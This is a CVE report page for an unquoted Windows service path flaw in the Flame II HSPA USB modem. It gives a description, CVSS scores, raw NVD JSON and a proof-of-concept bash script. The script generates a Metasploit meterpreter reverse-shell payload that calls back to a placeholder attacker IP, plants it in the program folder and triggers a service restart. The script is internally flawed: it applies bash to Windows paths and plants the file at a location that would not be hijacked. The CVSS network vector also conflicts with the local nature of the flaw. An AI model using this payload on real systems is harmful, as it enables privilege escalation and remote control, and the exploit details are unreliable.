Security Vulnerability Report
CVE-2022-50935 CVSS 9.8 CRITICAL

Published: 2026-01-13 23:15:59
Last Modified: 2026-04-15 00:35:42

Description

Flame II HSPA USB Modem contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Internet Telcel\ApplicationController.exe' to execute arbitrary code with elevated system privileges.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Flame II HSPA USB Modem (Alcatel X602A) - All versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2022-50935 PoC - Unquoted Service Path Exploitation
# Target: Flame II HSPA USB Modem (Alcatel X602A)
# Service: ApplicationController.exe

TARGET_PATH="C:\\Program Files (x86)\\Internet Telcel\\ApplicationController.exe"
MALICIOUS_EXE="C:\\Program Files (x86)\\Internet Telcel\\Internet.exe"
PAYLOAD="msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=4444 -f exe > Internet.exe"

echo "[+] CVE-2022-50935 Unquoted Service Path Exploit"
echo "[+] Target: $TARGET_PATH"

# Step 1: Generate malicious payload
echo "[+] Generating payload..."
eval $PAYLOAD

# Step 2: Copy malicious executable to intermediate path
echo "[+] Placing malicious executable at unquoted path..."
cp Internet.exe "$MALICIOUS_EXE"

# Step 3: Wait for service restart or trigger manually
echo "[+] Waiting for service restart..."
echo "[+] Trigger service restart with: sc stop <service_name> && sc start <service_name>"
echo "[+] Or wait for system reboot"

# Step 4: Start Metasploit listener
echo "[+] Start listener: use exploit/multi/handler"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50935", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:58.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flame II HSPA USB Modem contains an unquoted service path vulnerability in its Windows service configuration. Attackers can exploit the unquoted path in 'C:\\Program Files (x86)\\Internet Telcel\\ApplicationController.exe' to execute arbitrary code with elevated system privileges."}, {"lang": "es", "value": "El módem USB Flame II HSPA Flame II contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows. Los atacantes pueden explotar la ruta sin comillas en 'C:\\Program Files (x86)\\Internet Telcel\\ApplicationController.exe' para ejecutar código arbitrario con privilegios de sistema elevados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": 
"NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20160402093509/https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50708", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/flame-ii-modem-usb-unquoted-service-path", "source": "[email protected]"}]}}